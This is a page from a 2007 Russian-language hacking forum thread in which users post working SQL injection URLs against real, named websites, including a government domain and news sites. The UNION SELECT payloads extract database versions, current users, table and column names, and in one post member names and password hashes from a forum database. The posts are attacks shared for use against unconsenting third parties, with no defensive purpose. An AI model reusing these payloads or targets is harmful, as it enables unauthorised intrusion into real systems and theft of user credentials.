HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #701  
Старый 06.03.2007, 01:58
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

2 ice1k
самому слабо додумать дальше? =D
 
Ответить с цитированием

  #702  
Старый 06.03.2007, 02:13
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://akdgs.ru/news.php?id=-6+union+select+1,Convert(version()+using+cp1251),3 ,4,5,6
Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 2 символов.
хек?
 
Ответить с цитированием

  #703  
Старый 06.03.2007, 02:20
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от ice1k  
слабо? омг лол? постить пока не буду...
а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),p asswd),4,5+from+u19508.smf_members/*
 
Ответить с цитированием

  #704  
Старый 06.03.2007, 02:23
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
а мне пох http://www.a1tv.ru/AOpenBands.php?Band=-1163+union+select+1,2,concat(memberName,char(58),p asswd),4,5+from+u19508.smf_members/*
Вот и правильно, я этого и ждал, чтобы кто-нить запостил нормальный вариант... - я думал этого никогда не случится
 
Ответить с цитированием

  #705  
Старый 06.03.2007, 02:40
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,table_name+from+information_schema.tables+limit+1,1/*
Код:
http://www.usug.ub.gov.mn/photo_more.php?ids=-10+union+select+1,2,3,column_name+from+information_schema.columns+limit+1,1/*
пару таблиц и колонок нашел, но прав не хватает похоже.
 
Ответить с цитированием

  #706  
Старый 06.03.2007, 03:21
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Код:
http://www.gramota.ru/news.html?nn=-2043+union+select+1,2,user(),4,5,6/*
_-[A.M.D]HiM@S-_, а хотя не, продолжай курить ту же

Код:
http://ru-hosting.ru/article.php?sid=2222222289+union+select+1,2,user(),4,5,6/*
хз было или нет

Последний раз редактировалось n0ne; 06.03.2007 в 03:39..
 
Ответить с цитированием

  #707  
Старый 06.03.2007, 04:03
Nekt
Познающий
Регистрация: 31.08.2006
Сообщений: 67
Провел на форуме:
377085

Репутация: 18
По умолчанию

первые мои скули
Код:
http://www.tmx.kiev.ua/a-news/news.php?id=-2+union+select+1,2,3,version(),user(),6,7,8/*
Код:
http://www.kpla.kz/news.php?id=-2+union+select+1,2,3,4,user(),6/
Код:
http://ru-host.ru/next.php?id=3'
нечего так и не подобрал

Последний раз редактировалось Nekt; 06.03.2007 в 04:39..
 
Ответить с цитированием

  #708  
Старый 06.03.2007, 08:51
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Цитата:
Сообщение от Nekt  
Код:
http://ru-host.ru/next.php?id=3'
нечего так и не подобрал
omg, посмотри чуть выше.
 
Ответить с цитированием

  #709  
Старый 06.03.2007, 09:37
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

кусочек экзотики
Код:
http://top.ge/cat.php?c=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(version(),0),0),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/*
правда, таблицы подобрать не смог =\ утро...
//upd:
к mysql.user выводит "access denied for ...."

Последний раз редактировалось n1†R0x; 06.03.2007 в 09:43..
 
Ответить с цитированием

  #710  
Старый 06.03.2007, 11:04
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://ru-host.ru/next.php?id=3'
просто на страничку ничего не выводится
http://ru-host.ru/next.php?id=-2+union+select+1,2/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ